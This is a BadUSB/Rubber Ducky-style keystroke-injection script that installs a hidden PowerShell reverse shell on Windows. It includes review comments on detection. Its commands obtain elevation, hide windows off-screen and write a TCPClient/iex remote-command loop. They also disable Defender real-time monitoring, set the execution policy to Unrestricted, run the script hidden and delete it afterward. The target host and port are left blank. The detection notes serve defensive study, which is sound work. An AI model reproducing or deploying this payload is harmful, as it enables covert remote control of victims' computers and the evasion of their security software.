
ReversePowershell


REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)

REM Description: Reverse-PowerShell Windows. I am not responsible for your actions.


REM Version: 1.0
REM Category: Remote_Access
REM
REM Review notes (defensive reading of this keystroke-injection script):
REM   Stage 1 types PowerShell text into an elevated Notepad and saves it as
REM   C:\Windows\config-34593.ps1. Stage 2 opens an elevated cmd, relaxes the
REM   CurrentUser execution policy and runs the saved file in a hidden window.
REM   Every step is typed blind with fixed DELAYs, so it only proceeds on an
REM   unlocked session whose elevation prompt can be confirmed from the keyboard.
REM   A locked screen, a standard-user account that must enter credentials at
REM   the prompt, or USB HID device control breaks the sequence.
REM   Both Run-dialog commands below are recorded in the user's RunMRU key
REM   (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU).
DELAY 750
GUI r
DELAY 1000
REM Run dialog: PowerShell relaunches Notepad with -Verb runAs (elevation request).
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 750
REM ALT y presumably answers "Yes" on the consent prompt; this assumes an
REM English-language prompt and an account in the local Administrators group.
ALT y
DELAY 750
ENTER
REM ALT SPACE, m and the repeated DOWNARROW look like the window-menu "Move"
REM command being used to push the Notepad window off the visible screen.
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
REM The next STRING is one logical line that the page has wrapped. It is typed
REM into Notepad as script text: an Add-Content call that appends a
REM TCPClient read / iex / write loop to %TEMP%\34593.ps1. The host and port
REM arguments of TCPClient are empty in the published text.
REM Detection: PowerShell script block logging (event 4104) captures the iex
REM loop; also watch for .ps1 creation in %TEMP% and outbound TCP connections
REM owned by powershell.exe.
STRING Add-Content “$env:TEMP\34593.ps1” ‘$c = New-Object
System.Net.Sockets.TCPClient(“”,);$s = $c.GetStream();[byte[]]$b = 0..255|
%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$d = (New-Object -TypeName
System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $d 2>&1 | Out-String );
$sb2 = $sb + “PS ” + (pwd).Path + “> “;$sby =
([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sby,0,$sby.Length);$s.Flush()};
$c.Close()’
ENTER
DELAY 750
REM Second script line: asks Defender to turn real-time monitoring off. With
REM Tamper Protection enabled this setting change is ignored; when it does take
REM effect, Defender's operational log records event 5001.
STRING Set-MpPreference -DisableRealtimeMonitoring $true
DELAY 500
ENTER
DELAY 750
REM Third script line: starts the %TEMP% script in a hidden PowerShell window.
REM Process-creation auditing with command lines shows "-windowstyle hidden".
STRING start-Process powershell.exe -windowstyle hidden “$env:TEMP\34593.ps1”
ENTER
REM Fourth script line: Remove-Item on $MyInvocation.InvocationName, apparently
REM meant to delete the saved script after it runs. Responders should not count
REM on finding C:\Windows\config-34593.ps1 on disk and should work from logs.
STRING Remove-Item $MyINvocation.InvocationName
ENTER
REM Save dialog: the Notepad buffer is written under C:\Windows, which needs the
REM elevation obtained above. A .ps1 created in C:\Windows by notepad.exe is an
REM unusual file-creation event (Sysmon event 11 if Sysmon is deployed).
CTRL s
DELAY 1000
STRING C:\Windows\config-34593.ps1
ENTER
DELAY 1000
ALT F4
DELAY 750
GUI r
DELAY 750
REM Stage 2: same elevation pattern, this time for cmd.exe.
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 1000
REM Shrinks the console to 14 columns by 1 line before it is moved, presumably
REM to make the window hard to notice while commands are typed.
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 750
STRING m
DELAY 750
DOWNARROW
REPEAT 100
ENTER
REM The next STRING is wrapped by the page ("-Confirm:" / "$false"). It sets the
REM CurrentUser execution policy to Unrestricted. An execution policy set by
REM Group Policy takes precedence over the CurrentUser scope, and the change
REM persists after the session, so it is also a cleanup item during response.
STRING powershell Set-ExecutionPolicy ‘Unrestricted’ -Scope CurrentUser -Confirm:
$false
ENTER
DELAY 750
REM Runs the saved script hidden. powershell.exe with -windowstyle hidden and
REM -File pointing into C:\Windows, spawned from an elevated cmd.exe, is a
REM high-signal command line for process-creation alerting.
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-34593.ps1
ENTER
